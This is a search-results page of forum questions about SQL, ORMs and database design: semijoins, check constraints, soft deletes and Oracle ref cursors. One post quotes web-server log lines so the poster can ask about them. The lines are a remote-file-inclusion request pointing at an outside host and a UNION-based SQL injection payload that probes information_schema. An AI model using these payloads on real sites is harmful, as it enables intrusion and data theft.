Search Results

Search found 10719 results on 429 pages for 'temp tables'.

Page 328/429

  • How do I do a semijoin using SQLAlchemy?

    - by Jason Baker
    http://en.wikipedia.org/wiki/Relational_algebra#Semijoin Let's say that I have two tables: A and B. I want to make a query that works similarly to the following SQL statement using the SQLAlchemy ORM:

        SELECT A.*
        FROM A, B
        WHERE A.id = B.id
          AND B.type = 'some type';

    The thing is that I'm trying to separate A's and B's logic into different places. So I'd like to define two queries in separate places: one where A uses B as a subquery, but which only returns rows from A. I'm sure this is fairly easy to do, but an example would be nice if someone could show me.
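
    A relational semijoin is usually written as an EXISTS (or IN) subquery, which also makes it easy to define the inner query in one place and reuse it. A minimal sketch of the target SQL, using the tables from the question (how this is wrapped in the SQLAlchemy ORM depends on your mappings):

        SELECT A.*
        FROM A
        WHERE EXISTS (
            SELECT 1
            FROM B
            WHERE B.id = A.id
              AND B.type = 'some type'
        );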

    Read the article

  • Best Ruby ORM for Wrapping around Legacy MSSQL Database?

    - by Technocrat
    Hi. I found this answer and it sounds like almost exactly what I'm doing. I have heard mixed answers about whether or not DataMapper can support MSSQL through DataObjects. Basically, we have an app that uses a consistently structured database, consistently named tables, etc., in MSSQL. We're making all kinds of tools and stuff that have to interact with it, some of them remotely, so I decided that we need to create some common, simple access point to do read/write operations on the MSSQL app, since its API is all C# and other things I despise. Now my question is whether anyone has any examples or projects they know of where a Ruby ORM can essentially create models for another application's legacy database by defining the conventions of each model's pkeys, fkeys, table names, etc. Sequel is the only ORM I've used with MSSQL, but never to do anything quite like this. Any suggestions?

    Read the article

  • How to see contents of deployed datasource?

    - by callisto
    I've inherited a project (without a handy handover) that contains reports published to a Reporting Server (2005). My SSRS knowledge is 4 years stale, so I need your help. I need to edit one of the published reports; is this possible? I also want to peek into the Data Source on the RS, because that's probably where I can change stuff. I'll add more info as I get a better understanding of what exactly to ask. EDIT: I found a project for some of the reports and opened it up in VS2005 BI. Still, how do I see where the Data Source gets its data? It brings back 56 fields, but I don't know which tables/stored procs/queries are used to get them.

    Read the article

  • After running an insert or update query, need the last inserted record to compare in VB.NET / SQL Server

    - by ereffe
    I have two queries in VB.NET with an if clause: if x = 0 then insert into table1, else update table1. Both queries have 5 fields. Now, what I want to do is, after this insert or update takes place, look at the inserted/updated record and compare it with another table (table2). Especially for the update case, I have 5 fields in both tables. If any of the 5 fields don't match table2, then I insert a new record into table2, which is the updated record in table1. How can I do this?
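
    One way to express the "copy the row into table2 only if it differs" step is a single INSERT ... SELECT guarded by NOT EXISTS. This is only a sketch with made-up key and column names (id, col1..col5), it assumes table2 can hold more than one row per id (a history-style table), and it treats NULLs as non-matching, so adjust the comparison if NULLs should count as equal:

        INSERT INTO table2 (id, col1, col2, col3, col4, col5)
        SELECT t1.id, t1.col1, t1.col2, t1.col3, t1.col4, t1.col5
        FROM table1 AS t1
        WHERE t1.id = @id                -- the row just inserted/updated
          AND NOT EXISTS (
              SELECT 1
              FROM table2 AS t2
              WHERE t2.id   = t1.id
                AND t2.col1 = t1.col1
                AND t2.col2 = t1.col2
                AND t2.col3 = t1.col3
                AND t2.col4 = t1.col4
                AND t2.col5 = t1.col5
          );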

    Read the article

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but it's always setting the x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other injection attempts in the request log that have straight SQL written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they all reach a 404, but I'm still wondering about the intent behind them. I know this is vague, but maybe someone knows whether this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site, which could be the reason. Any suggestions as to what all these are?

    Read the article

  • NHibernateUtil.Initialize and Table where clause (Soft Delete)

    - by Pascal
    We are using NHibernate but sometimes load proxies manually using the NHibernateUtil.Initialize call. We also employ soft delete and have a "where" condition on all our mappings to tables. SQL generated by NHibernate successfully adds the where condition (i.e. DELETED IS NULL); however, we notice that NHibernateUtil.Initialize does not observe the constraints of the mapping files, i.e. none of the SQL generated by NHibernateUtil.Initialize observes our DELETED IS NULL condition. Is there something we're missing, as we would really like to employ manual loading of some entity collections when the situation demands it? We are using FluentNHibernate for our mapping.

    Read the article

  • How do I create a multiple-table check constraint?

    - by Zack Peterson
    Please imagine this small database... Diagram

    Tables

        Volunteer      Event          Shift          EventVolunteer
        =========      =====          =====          ==============
        Id             Id             Id             EventId
        Name           Name           EventId        VolunteerId
        Email          Location       VolunteerId
        Phone          Day            Description
        Comment        Description    Start
                                      End

    Associations

    Volunteers may sign up for multiple events. Events may be staffed by multiple volunteers. An event may have multiple shifts. A shift belongs to only a single event. A shift may be staffed by only a single volunteer. A volunteer may staff multiple shifts.

    Check Constraints

    Can I create a check constraint to enforce that no shift is staffed by a volunteer that's not signed up for that shift's event? Can I create a check constraint to enforce that two overlapping shifts are never staffed by the same volunteer?
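
    For the first constraint, SQL Server allows a CHECK constraint to call a scalar user-defined function, and that function can look at another table. A rough sketch with made-up function and constraint names (caveat: such checks only fire when Shift rows are inserted or updated, not when an EventVolunteer row is later deleted, so triggers are the more watertight option, and the overlapping-shifts rule is usually enforced with a trigger as well):

        CREATE FUNCTION dbo.fn_IsSignedUp (@EventId INT, @VolunteerId INT)
        RETURNS INT
        AS
        BEGIN
            -- number of sign-up rows linking this volunteer to this event
            RETURN (SELECT COUNT(*)
                    FROM EventVolunteer
                    WHERE EventId = @EventId
                      AND VolunteerId = @VolunteerId);
        END;
        GO

        ALTER TABLE Shift ADD CONSTRAINT CK_Shift_VolunteerSignedUp
            CHECK (VolunteerId IS NULL
                   OR dbo.fn_IsSignedUp(EventId, VolunteerId) > 0);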

    Read the article

  • Getting counts of 0 from a query with a double group by

    - by Maltiriel
    I'm trying to write a query that gets the counts for a table (call it item) categorized by two different things, call them type and code. What I'm hoping for as output is the following:

        Type  Code  Count
        1     A     3
        1     B     0
        1     C     10
        2     A     0
        2     B     13
        2     C     2

    And so forth. Both type and code are found in lookup tables, and each item can have just one type but more than one code, so there's also a pivot (aka junction or join) table for the codes. I have a query that can get this result:

        Type  Code  Count
        1     A     3
        1     C     10
        2     B     13
        2     C     2

    and it looks like (with join conditions omitted):

        SELECT typelookup.name, codelookup.name, COUNT(item.id)
        FROM typelookup
        LEFT OUTER JOIN item
        JOIN itemcodepivot
        RIGHT OUTER JOIN codelookup
        GROUP BY typelookup.name, codelookup.name

    Is there any way to alter this query to get the results I'm looking for? This is in MySQL, if that matters. I'm not actually sure this is possible all in one query, but if it is I'd really like to know how. Thanks for any ideas.
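
    One common shape for this is to build every (type, code) combination first with a CROSS JOIN of the two lookup tables, then LEFT JOIN the items and pivot rows onto it and count the pivot matches (counting the pivot column, not item.id, is what keeps the zeros). A sketch with guessed join-column names (type_id, item_id, code_id), so adjust to the real schema:

        SELECT t.name            AS type_name,
               c.name            AS code_name,
               COUNT(p.item_id)  AS item_count
        FROM typelookup t
        CROSS JOIN codelookup c
        LEFT JOIN item i
               ON i.type_id = t.id
        LEFT JOIN itemcodepivot p
               ON p.item_id = i.id
              AND p.code_id = c.id
        GROUP BY t.name, c.name
        ORDER BY t.name, c.name;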

    Read the article

  • PL/SQL exception and Java programs

    - by edwards
    Hi. Business logic is coded in PL/SQL packages, procedures, and functions. Java programs call the PL/SQL packages, procedures, and functions to do database work. The PL/SQL programs store exceptions in Oracle tables whenever an exception is raised. How would my Java programs get the exceptions, since the exception, instead of being propagated from PL/SQL to Java, is persisted to an Oracle table and the procs/functions just return 1 or 0? Sorry folks, I should have added this constraint much earlier and avoided this confusion: as with many legacy projects, we don't have the freedom to modify the stored procedures.
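
    Since the procedures can't be changed, one low-impact option is for the Java side to follow up a 0 return code with a query against the exception-logging table and surface that row as a Java exception. The table and column names below are invented for illustration only; substitute whatever the logging table actually uses:

        -- latest logged error for the procedure that just returned 0
        SELECT *
        FROM (SELECT error_code, error_message, created_on
              FROM   app_error_log
              WHERE  procedure_name = :proc_name
              ORDER  BY created_on DESC)
        WHERE ROWNUM = 1;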

    Read the article

  • Magento - Mage::getModel not working on remote server

    - by Diego
    I'm struggling with an issue for which I can't find an explanation. I have two development environments that I use for my projects. I created a simple module for Magento and tested it on one environment. After overcoming all of Magento's complications, the module works as expected. This is on XAMPP. I then copied the module to the development Linux environment, on a hosted server, and it crashes miserably. I did some debugging and found out that a call to Mage::getModel() returns bool(false) instead of an instance of the Model I requested. I double-checked all files and directories, and they match. The database is not involved (not from my side, at least; I don't need tables) and both environments have only me as a user, with Admin permissions. Any suggestion on where I should start looking is welcome, thanks.

    Read the article

  • CakePHP HABTM Filtering

    - by James Haigh
    Hi, I've got two tables - users and servers, and for the HABTM relationship, users_servers. Users HABTM servers and vice versa. I'm trying to find a way for Cake to select the servers that a user is assigned to. I'm trying things like $this->User->Server->find('all'); which just returns all the servers, regardless of whether they belong to the user. $this->User->Server->find('all', array('conditions' => array('Server.user_id' => 1))) just gives an unknown column SQL error. I'm sure I'm missing something obvious but just need someone to point me in the right direction. Thanks!
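
    For reference, the result being aimed for is, in SQL and using Cake's conventional table and foreign-key names (yours may differ), the servers joined through the HABTM table and filtered by the user:

        SELECT Server.*
        FROM servers AS Server
        INNER JOIN users_servers AS UsersServer
                ON UsersServer.server_id = Server.id
        WHERE UsersServer.user_id = 1;

    In Cake this is typically reached by querying through the join model, or from the User side with Containable, rather than by putting a user_id condition directly on Server (which is why the unknown-column error appears).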

    Read the article

  • How do I reload a Roo project without clearing the database?

    - by Omniwombat
    I've been learning how to build projects using Roo and am making good progress. I have the nucleus of a project which correctly displays my defined entities and allows me to create, edit, and delete the representative objects. I am using MySQL as the database, and I see that objects entered using the UI correctly appear in the MySQL database. Per the Roo instructions, I am starting the webapp using "mvn tomcat:run". Unfortunately, I've discovered that whenever I restart Tomcat using Maven, it clears all of the existing objects out of the database. I'm left with empty tables. It seems to do this as the final step just prior to Tomcat stating that the server has started. I know this is just me being a n00b, but searches haven't been very helpful, and none of the project's XML files seem relevant,

    Read the article

  • Pitfalls with mixing storage engines in MySQL with Django?

    - by Dave Orr
    I'm running a Django system over MySQL in Amazon's cloud, and the database default is InnoDB. But now I want to put a full-text index on a couple of tables for searching, which evidently requires MyISAM. The obvious solution is to just tell MySQL to ALTER TABLE to MyISAM, but are there going to be any issues with that? One that comes to mind is that I'll have to remember to do that any time I build a new version of the database, which should theoretically be rare, but there doesn't seem to be a way to tell Django to set the storage engine at the table level. I guess I could write a migration (we use South). Any other things I might be missing? What could possibly go wrong?
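
    The raw MySQL statements the migration would need are small; the table and column names here are placeholders for whatever Django generated for the app:

        -- switch the table that needs full-text search to MyISAM
        ALTER TABLE app_item ENGINE = MyISAM;

        -- add the full-text index used by MATCH ... AGAINST queries
        ALTER TABLE app_item ADD FULLTEXT INDEX app_item_fulltext (title, body);

        -- confirm which engine the table is now using
        SHOW TABLE STATUS LIKE 'app_item';

    In a South migration these can be issued with db.execute(), so the engine change is reapplied whenever the database is rebuilt.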

    Read the article

  • replacing data.frame element-wise operations with data.table (that used rowname)

    - by Harold
    So let's say I have the following data.frames:

        df1 <- data.frame(y = 1:10, z = rnorm(10), row.names = letters[1:10])
        df2 <- data.frame(y = c(rep(2, 5), rep(5, 5)), z = rnorm(10), row.names = letters[1:10])

    And perhaps the "equivalent" data.tables:

        dt1 <- data.table(x = rownames(df1), df1, key = 'x')
        dt2 <- data.table(x = rownames(df2), df2, key = 'x')

    If I want to do element-wise operations between df1 and df2, they look something like

        dfRes <- df1 / df2

    And rownames() is preserved:

        R> head(dfRes)
            y          z
        a 0.5  3.1405463
        b 1.0  1.2925200
        c 1.5  1.4137930
        d 2.0 -0.5532855
        e 2.5 -0.0998303
        f 1.2 -1.6236294

    My poor understanding of data.table says the same operation should look like this:

        dtRes <- dt1[, !'x', with = F] / dt2[, !'x', with = F]
        dtRes[, x := dt1[,x,]]
        setkey(dtRes, x)

    (setkey optional) Is there a more data.table-esque way of doing this? As a slightly related aside, more generally, I would have other columns such as factors in each data.table and I would like to omit those columns while doing the element-wise operations, but still have them in the result. Does this make sense? Thanks!

    Read the article

  • Why is Postgres doing a Hash in this query?

    - by Claudiu
    I have two tables: A and P. I want to get information out of all rows in A whose id is in a temporary table I created, tmp_ids. However, there is additional information about A in the P table, foo, and I want to get this info as well. I have the following query:

        SELECT A.H_id AS hid, A.id AS aid, P.foo, A.pos, A.size
        FROM tmp_ids, P, A
        WHERE tmp_ids.id = A.H_id
          AND P.id = A.P_id

    I noticed it going slowly, and when I asked Postgres to explain, I noticed that it combines tmp_ids with an index on A I created for H_id with a nested loop. However, it hashes all of P before doing a hash join with the result of the first merge. P is quite large and I think this is what's taking all the time. Why would it create a hash there? P.id is P's primary key, and A.P_id has an index of its own.
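
    A quick way to see why the planner prefers the hash is to compare its row estimates with reality, and to see which plan it falls back to when hash joins are disabled for the session (a diagnostic step only, not a production setting). Missing statistics on the temp table are a common cause of an oversized hash:

        -- give the planner statistics for the temp table
        ANALYZE tmp_ids;

        EXPLAIN ANALYZE
        SELECT A.H_id AS hid, A.id AS aid, P.foo, A.pos, A.size
        FROM tmp_ids, P, A
        WHERE tmp_ids.id = A.H_id
          AND P.id = A.P_id;

        -- for comparison only: steer the planner away from hash joins,
        -- re-run the EXPLAIN ANALYZE above, then restore the setting
        SET enable_hashjoin = off;
        RESET enable_hashjoin;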

    Read the article

  • Custom session state provider needed for DB storage?

    - by subt13
    I know this question is related to many others, but please bear with me. I am trying an experiment to store all information in database tables instead of the ASP.NET session. In ASP.NET 4 one can create a custom provider for session state. So, again: should I implement a custom session-state provider, or should I just disable session state (in Web.config)? Thanks! From the comments, my question can be misunderstood. Hopefully this tidbit will help clarify: I don't want to store the session in the database. I want to store information in the database that you would typically store in the session. One reason why: I don't want to carry around a session on every page, especially if that page doesn't care about 90 percent of the information in the session.

    Read the article

  • SQL Server - Select one random record not showing duplicates

    - by Lukes123
    I have two tables, events and photos, which are related via the 'Event_ID' column. I wish to select ONE random photo from each event and display them. How can I do this? I have the following, which displays all the associated photos. How can I limit it to one per event?

        SELECT Photos.Photo_Id, Photos.Photo_Path, Photos.Event_Id,
               Events.Event_Title, Events.Event_StartDate, Events.Event_EndDate
        FROM Photos, Events
        WHERE Photos.Event_Id = Events.Event_Id
          AND Events.Event_EndDate < GETDATE()
          AND Events.Event_EndDate IS NOT NULL
          AND Events.Event_StartDate IS NOT NULL
        ORDER BY NEWID()

    Thanks Luke Stratton
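
    On SQL Server 2005 and later, one way to keep a single random photo per event is to number the photos within each event in random order and keep only the first. A sketch built on the columns from the query above:

        SELECT Photo_Id, Photo_Path, Event_Id, Event_Title, Event_StartDate, Event_EndDate
        FROM (
            SELECT p.Photo_Id, p.Photo_Path, p.Event_Id,
                   e.Event_Title, e.Event_StartDate, e.Event_EndDate,
                   -- random ordering restarted for each event
                   ROW_NUMBER() OVER (PARTITION BY p.Event_Id ORDER BY NEWID()) AS rn
            FROM Photos p
            INNER JOIN Events e ON e.Event_Id = p.Event_Id
            WHERE e.Event_EndDate < GETDATE()
              AND e.Event_EndDate IS NOT NULL
              AND e.Event_StartDate IS NOT NULL
        ) AS ranked
        WHERE rn = 1;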

    Read the article

  • Automatically update audit information on Entity

    - by Nix
    I have an entity model that has audit information on every table (50+ tables):

        CreateDate
        CreateUser
        UpdateDate
        UpdateUser

    Currently we are updating the audit information programmatically. Ex:

        if (changed) {
            entity.UpdatedOn = DateTime.Now;
            entity.UpdatedBy = Environment.UserName;
            context.SaveChanges();
        }

    But I am looking for a more automated solution. During SaveChanges, if an entity is created/updated, I would like to automatically update these fields before sending them to the database for storage. Any suggestion on how I could do this? Let me know if any more information is needed.

    Read the article

  • Different behavior for REF CURSOR between Oracle 10g and 11g when unique index present?

    - by wweicker
    Description

    I have an Oracle stored procedure that has been running for 7 or so years both locally on development instances and on multiple client test and production instances running Oracle 8, then 9, then 10, and recently 11. It has worked consistently until the upgrade to Oracle 11g. Basically, the procedure opens a reference cursor, updates a table, then completes. In 10g the cursor will contain the expected results but in 11g the cursor will be empty. No DML or DDL changed after the upgrade to 11g. This behavior is consistent on every 10g or 11g instance I've tried (10.2.0.3, 10.2.0.4, 11.1.0.7, 11.2.0.1 - all running on Windows). The specific code is much more complicated, but to explain the issue in a somewhat realistic overview: I have some data in a header table and a bunch of child tables that will be output to PDF. The header table has a boolean (NUMBER(1) where 0 is false and 1 is true) column indicating whether that data has been processed yet. The view is limited to only show rows that have not been processed (the view also joins on some other tables, makes some inline queries and function calls, etc). So at the time when the cursor is opened, the view shows one or more rows; then after the cursor is opened, an update statement runs to flip the flag in the header table, a commit is issued, then the procedure completes. On 10g, the cursor opens, it contains the row, then the update statement flips the flag and running the procedure a second time would yield no data. On 11g, the cursor never contains the row; it's as if the cursor does not open until after the update statement runs. I'm concerned that something may have changed in 11g (hopefully a setting that can be configured) that might affect other procedures and other applications. What I'd like to know is whether anyone knows why the behavior is different between the two database versions and whether the issue can be resolved without code changes.

    Update 1: I managed to track the issue down to a unique constraint. It seems that when the unique constraint is present in 11g the issue is reproducible 100% of the time regardless of whether I'm running the real world code against the actual objects or the following simple example.

    Update 2: I was able to completely eliminate the view from the equation. I have updated the simple example to show the problem exists even when querying directly against the table.
    Simple Example

        CREATE TABLE tbl1 (
            col1 VARCHAR2(10),
            col2 NUMBER(1)
        );

        INSERT INTO tbl1 (col1, col2) VALUES ('TEST1', 0);

        /* View is no longer required to demonstrate the problem
        CREATE OR REPLACE VIEW vw1 (col1, col2) AS
            SELECT col1, col2 FROM tbl1 WHERE col2 = 0;
        */

        CREATE OR REPLACE PACKAGE pkg1 AS
            TYPE refWEB_CURSOR IS REF CURSOR;
            PROCEDURE proc1 (crs OUT refWEB_CURSOR);
        END pkg1;

        CREATE OR REPLACE PACKAGE BODY pkg1 IS
            PROCEDURE proc1 (crs OUT refWEB_CURSOR) IS
            BEGIN
                OPEN crs FOR
                    SELECT col1
                    FROM tbl1
                    WHERE col1 = 'TEST1'
                      AND col2 = 0;

                UPDATE tbl1
                SET col2 = 1
                WHERE col1 = 'TEST1';

                COMMIT;
            END proc1;
        END pkg1;

    Anonymous Block Demo

        DECLARE
            crs1 pkg1.refWEB_CURSOR;
            TYPE rectype1 IS RECORD (
                col1 vw1.col1%TYPE
            );
            rec1 rectype1;
        BEGIN
            pkg1.proc1 ( crs1 );

            DBMS_OUTPUT.PUT_LINE('begin first test');
            LOOP
                FETCH crs1 INTO rec1;
                EXIT WHEN crs1%NOTFOUND;
                DBMS_OUTPUT.PUT_LINE(rec1.col1);
            END LOOP;
            DBMS_OUTPUT.PUT_LINE('end first test');
        END;

        /* After creating this index, the problem is seen */
        CREATE UNIQUE INDEX unique_col1 ON tbl1 (col1);

        /* Reset data to initial values */
        TRUNCATE TABLE tbl1;
        INSERT INTO tbl1 (col1, col2) VALUES ('TEST1', 0);

        DECLARE
            crs1 pkg1.refWEB_CURSOR;
            TYPE rectype1 IS RECORD (
                col1 vw1.col1%TYPE
            );
            rec1 rectype1;
        BEGIN
            pkg1.proc1 ( crs1 );

            DBMS_OUTPUT.PUT_LINE('begin second test');
            LOOP
                FETCH crs1 INTO rec1;
                EXIT WHEN crs1%NOTFOUND;
                DBMS_OUTPUT.PUT_LINE(rec1.col1);
            END LOOP;
            DBMS_OUTPUT.PUT_LINE('end second test');
        END;

    Example of what the output on 10g would be:

        begin first test
        TEST1
        end first test
        begin second test
        TEST1
        end second test

    Example of what the output on 11g would be:

        begin first test
        TEST1
        end first test
        begin second test
        end second test

    Clarification

    I can't remove the COMMIT because in the real world scenario the procedure is called from a web application. When the data provider on the front end calls the procedure it will issue an implicit COMMIT when disconnecting from the database anyways. So if I remove the COMMIT in the procedure then yes, the anonymous block demo would work but the real world scenario would not because the COMMIT would still happen.

    Question

    Why is 11g behaving differently? Is there anything I can do other than re-write the code?

    Read the article

  • Grails - Need to restrict fetched rows based on condition on join table

    - by sector7
    Hi guys, I have two domains, Car and Driver, which have a many-to-many relationship. This association is defined in the table tblCarsDrivers which has, not surprisingly, the primary keys of both tables BUT additionally also has a new boolean field, deleted. Herein lies the problem. When I run a find/get query on the Car domain, all related drivers are fetched irrespective of their deleted status in tblCarsDrivers, which is expected. I need to put a clause/constraint in place to exclude the deleted drivers from the list of fetched records. PS: I tried using an association domain CarDriver in the joinTable name but that seems not to work. Apparently it expects only table names, not maps. PPS: I know it's unnatural to have any other fields besides the mapping keys in a mapping table, but this is how I got it and it can't be changed. The Car domain is defined as such:

        class Car {
            Integer id
            String name

            static hasMany = [drivers: Driver]

            static mapping = {
                table 'tblCars'
                version false
                drivers joinTable: [name: 'tblCarsDrivers', column: 'driverid', key: 'carid']
            }
        }

    Thanks!

    Read the article

  • How to achieve a "merge" of two data sets with an Insert SQL statement (Oracle DBMS)?

    - by Roman Kagan
    Hi: What would be the insert SQL statement to merge data from two tables? For example, I have an events_source_1 table (columns: event_type_id, event_date) and an events_source_2 table (same columns), and an events_target table (columns: event_type_id, past_event_date nullable, future_event_date nullable). Events_source_1 has past events, events_source_2 has future events, and the resultant events_target would contain past and future events in the same row for the same event_type_id. If there is no past event but there is a future event, then past_event_date won't be set and only future_event_date will be, and the opposite is true too. Thanks a lot in advance for helping me resolve this problem.
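
    Assuming each source has at most one row per event_type_id (aggregate first if that's not the case), a FULL OUTER JOIN keeps the types that appear in only one of the sources and leaves the other date NULL. A sketch:

        INSERT INTO events_target (event_type_id, past_event_date, future_event_date)
        SELECT COALESCE(p.event_type_id, f.event_type_id),
               p.event_date,                       -- NULL when there is no past event
               f.event_date                        -- NULL when there is no future event
        FROM events_source_1 p
        FULL OUTER JOIN events_source_2 f
                     ON f.event_type_id = p.event_type_id;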

    Read the article

  • CakePHP: How can I disable auto-increment on Model.id?

    - by tomws
    CakePHP 1.3.0, mysqli. I have a model, Manifest, whose ID should be the unique number from a printed form. However, with Manifest.id set as the primary key, CakePHP is helping me by setting up auto-increment on the field. Is there a way to flag the field via schema.php and/or elsewhere to disable auto-increment? I need just a plain old primary key without it. The only other solution I can imagine is adding a separate manifest-number field and changing foreign keys in a half dozen other tables. A bit wasteful and not as intuitive.
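
    On the MySQL side, redefining the column without the AUTO_INCREMENT attribute removes it while leaving the primary key in place. A sketch against Cake's conventional table name and a guessed column type (match the existing definition exactly when running it):

        ALTER TABLE manifests MODIFY id INT(10) UNSIGNED NOT NULL;

    Whether schema.php can express this is a separate question; if it keeps re-adding auto-increment for the integer id, a small manual migration for this one change is a pragmatic fallback.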

    Read the article

  • IF/ELSE makes stored procedure not return a result set

    - by Brendan Long
    I have a stored procedure that needs to return something from one of two tables:

        IF @x = 1
            SELECT @y FROM Table_A
        ELSE IF @x = 2
            SELECT @y FROM Table_B

    Either SELECT alone will return what I want, but adding the IF/ELSE makes it stop returning anything. I tried:

        IF @x = 1
            RETURN SELECT @y FROM Table_A
        ELSE IF @x = 2
            RETURN SELECT @y FROM Table_B

    But that causes a syntax error. The two options I see are both horrible:

    1. Do a UNION and make sure that only one side has any results:

        SELECT @y FROM Table_A WHERE @x = 1
        UNION
        SELECT @y FROM Table_B WHERE @x = 2

    2. Create a temporary table to store one row in, and create and delete it every time I run this procedure (lots).

    Neither solution is elegant, and I assume they would both be horrible for performance (unless MS SQL is smart enough not to search the tables when the WHERE clause is always false). Is there anything else I can do? Is option 1 not as bad as I think?
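
    In T-SQL an IF/ELSE branch can return a result set, but each branch is safer wrapped in BEGIN...END, and note that SELECT @y returns the variable's value once per row rather than a column named by it. A sketch of both readings (the column name SomeColumn and the sp_executesql form are illustrative only):

        IF @x = 1
        BEGIN
            SELECT SomeColumn FROM Table_A;
        END
        ELSE IF @x = 2
        BEGIN
            SELECT SomeColumn FROM Table_B;
        END

        -- If @y is really meant to be a column *name*, dynamic SQL is needed:
        DECLARE @sql NVARCHAR(400);
        SET @sql = N'SELECT ' + QUOTENAME(@y) + N' FROM '
                 + CASE WHEN @x = 1 THEN N'Table_A' ELSE N'Table_B' END + N';';
        EXEC sp_executesql @sql;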

    Read the article

  • Symfony 1.4: Deleting a sfGuardUser

    - by Tom
    Hi, I'm having some trouble with the following... I have a sfGuardUser table set up normally, and it has a one-to-one relationship with a Profile table, which contains some additional user info. When a user wants to delete themselves from the site, I'd like to retain their info in the Profile table for various purposes BUT delete the sfGuardUser in order to keep that table cleaner/shorter (not just set it to inactive). I was under the impression that I could set the FK in the Profile table to NULL and then delete the sfGuardUser, but it seems the FK constraint fails. Indeed, it seems I can't delete either and the queries fail:

    - If I try to delete the sfGuardUser, the Profile table will have an invalid FK
    - If I try to delete a Profile, the sfGuardUser will have an invalid FK

    Other than leaving outdated sfGuardUsers and Profiles in these tables, or having to use a cascaded delete to get rid of both, can anyone tell me if there's any other way around this? Thank you.
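
    If the schema is MySQL/InnoDB, the usual way to get "keep the Profile, null out the link" is to make the foreign-key column nullable and recreate the constraint with ON DELETE SET NULL, so deleting the sfGuardUser row clears the reference automatically. The constraint and column names here are guesses based on a typical sfGuard + profile setup, so check the actual schema first:

        -- drop the existing constraint before changing the column
        ALTER TABLE profile DROP FOREIGN KEY profile_FK_1;

        -- the FK column must allow NULL for SET NULL to work
        ALTER TABLE profile MODIFY sf_guard_user_id INT NULL;

        ALTER TABLE profile
            ADD CONSTRAINT profile_FK_1
            FOREIGN KEY (sf_guard_user_id)
            REFERENCES sf_guard_user (id)
            ON DELETE SET NULL;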

    Read the article

  • What is the effect on record size of reordering columns in PostgreSQL?

    - by Summer
    Since Postgres can only add columns at the end of tables, I end up re-ordering by adding new columns at the end of the table, setting them equal to existing columns, and then dropping the original columns. So, what does PostgreSQL do with the memory that's freed by dropped columns? Does it automatically re-use the memory, so a single record consumes the same amount of space as it did before? But that would require a re-write of the whole table, so to avoid that, does it just keep a bunch of blank space around in each record? Thanks! ~S
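
    For what it's worth, the space question can be checked directly: a dropped column is only hidden, existing rows keep their old data for it until they are rewritten, and updated or newly inserted rows store effectively nothing for it. Rewriting the whole table (for example VACUUM FULL on recent versions, which takes an exclusive lock while it runs) reclaims that space at once; the table name below is a placeholder:

        -- size before
        SELECT pg_size_pretty(pg_total_relation_size('my_table'));

        -- rewrite the table, discarding dead column data from existing rows
        VACUUM FULL my_table;

        -- size after
        SELECT pg_size_pretty(pg_total_relation_size('my_table'));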

    Read the article
